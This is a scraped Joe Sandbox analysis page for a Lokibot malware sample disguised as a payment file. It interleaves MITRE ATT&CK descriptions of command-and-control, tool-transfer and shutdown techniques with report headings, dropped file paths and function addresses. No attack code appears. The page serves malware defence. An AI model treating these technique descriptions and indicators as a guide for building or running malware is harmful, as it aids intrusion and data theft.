Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment_copy28476450.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsg6B4D.tmp

C:\Users\user\AppData\Local\Temp\ntwcyphb.r

C:\Users\user\AppData\Local\Temp\stvrrcrc.d

C:\Users\user\AppData\Local\Temp\wcycejenv.exe

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
Payment_copy28476450.exe

Function 0040324F Relevance: 84.3, APIs: 26, Strings: 22, Instructions: 313
stringfilecomCOMMON

Function 00405620 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 156
filestringCOMMON

Function 00406333 Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 00405FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 0040374E Relevance: 49.2, APIs: 13, Strings: 15, Instructions: 215
stringregistryCOMMON

Function 00402C88 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00401734 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147
stringtimeCOMMON

Function 00402F2E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Function 00403059 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108
fileCOMMON

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Function 0040601D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
libraryCOMMON

Function 00405A01 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Function 00406184 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198
COMMON

Function 004058CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Function 0040555B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Function 00406768 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Function 00406969 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Function 0040667F Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre